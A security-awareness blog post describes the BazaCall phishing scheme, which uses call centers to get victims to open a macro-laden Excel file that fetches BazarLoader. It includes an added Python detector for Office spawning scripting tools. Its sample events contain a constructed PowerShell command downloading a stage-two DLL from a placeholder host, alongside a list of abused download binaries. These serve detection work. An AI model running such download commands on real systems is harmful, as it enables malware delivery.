Unlike traditional phishing emails that simply attach or link to a malicious file, a new scam from the cybercriminal group BazaCall has victims call in, where they are then instructed to download the malware themselves.
It seems a bit counterintuitive: instead of just phishing the victim with a malicious attachment, make them interact with a call center that then convinces them to open a malicious Excel file. But, according to Microsoft Security Intelligence, this is exactly what the folks at BazaCall are doing.
Using a phishing email themed around a fictitious software trial ending in 24 hours, after which the potential victim will supposedly be charged for the software unless they cancel, BazaCall tricks victims into calling in to cancel a “subscription” they know nothing about.
During the call, the victim is instructed to download a malicious Excel file containing a macro that downloads the BazarLoader malware. This group has also been observed using the Cobalt Strike penetration testing kit to steal credentials and move laterally within victim networks.
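The infection chain described above, an Office macro launching a second-stage downloader, leaves a visible trace in endpoint telemetry: Excel becomes the parent of a scripting or download utility. The following is an added example, not code from the original post or from Microsoft, of a small detection that scans process-creation events for exactly that parent/child pairing. The log format, field names, host and user names, URLs and the list of suspicious child processes are all constructed assumptions for illustration; real telemetry (Sysmon Event ID 1, EDR process events) will have different fields.

```python
"""
Added example (not from the original post): flag an Office application
spawning a child process commonly used to fetch or run a second stage.
The 'key=value|key=value' event format is constructed for this example.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Office binaries that should rarely spawn scripting or download tooling.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}

# Child processes a macro typically abuses (assumed list, extend as needed).
SUSPICIOUS_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
    "bitsadmin.exe", "curl.exe",
}

URL_PATTERN = re.compile(r"https?://\S+", re.IGNORECASE)


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str
    user: str


def parse_event(line: str) -> ProcessEvent:
    """Parse one constructed 'Key=Value|Key=Value' process-creation line."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")  # first '=' only; values may contain '='
        fields[key.strip()] = value.strip()
    return ProcessEvent(
        parent_image=fields.get("ParentImage", ""),
        image=fields.get("Image", ""),
        command_line=fields.get("CommandLine", ""),
        user=fields.get("User", ""),
    )


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: ProcessEvent) -> Optional[str]:
    """Return a finding label, or None when the event looks benign."""
    parent = basename(event.parent_image)
    child = basename(event.image)
    if parent not in OFFICE_PARENTS or child not in SUSPICIOUS_CHILDREN:
        return None
    # A URL on the command line points at an outright download attempt.
    if URL_PATTERN.search(event.command_line):
        return "office-child-download"
    return "office-child-lolbin"


def scan(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (label, child basename) for every flagged event, in log order."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        event = parse_event(line)
        label = classify(event)
        if label:
            findings.append((label, basename(event.image)))
    return findings


# Constructed sample telemetry; paths, users and URLs are placeholders.
SAMPLE_EVENTS = [
    # Excel spawning PowerShell that fetches something: the macro pattern.
    "ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -NoProfile -Command Invoke-WebRequest "
    "http://example.invalid/stage2 -OutFile C:\\Users\\Public\\stage2.dll"
    "|User=CORP\\alice",
    # Excel spawning cmd.exe with no URL: still unusual, lower confidence.
    "ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE"
    "|Image=C:\\Windows\\System32\\cmd.exe|CommandLine=cmd.exe /c dir"
    "|User=CORP\\alice",
    # A user launching PowerShell from Explorer: not an Office parent.
    "ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -Command Invoke-WebRequest http://example.invalid/"
    "|User=CORP\\bob",
    # Excel spawning the print helper: expected, benign child.
    "ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE"
    "|Image=C:\\Windows\\splwow64.exe|CommandLine=splwow64.exe 12288"
    "|User=CORP\\alice",
]

if __name__ == "__main__":
    for label, child in scan(SAMPLE_EVENTS):
        print(f"{label}: {child}")
```

Running the block prints two findings, the PowerShell download and the bare cmd.exe launch, and stays silent on the Explorer and print-helper events. The parent/child check is the durable part of the rule; the URL match only raises confidence, since a macro can also stage its payload through an encoded command or a dropped script that carries no URL on the command line.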
While the added step of making someone call a scammer on the phone just to do the equivalent of double-clicking an attachment seems ludicrous, it does add credibility to the process and may lower the victim's defenses long enough for the malicious Excel file to do its work.
This scam is actually pretty smart: it goes to such lengths to establish itself as legitimate that someone who wouldn’t fall for an email saying “you owe us money – see the attachment” may well fall for this one. It’s one of the reasons Security Awareness Training is so important. Users need continual education on the latest scams, methods, and social engineering tactics so that they are always on guard.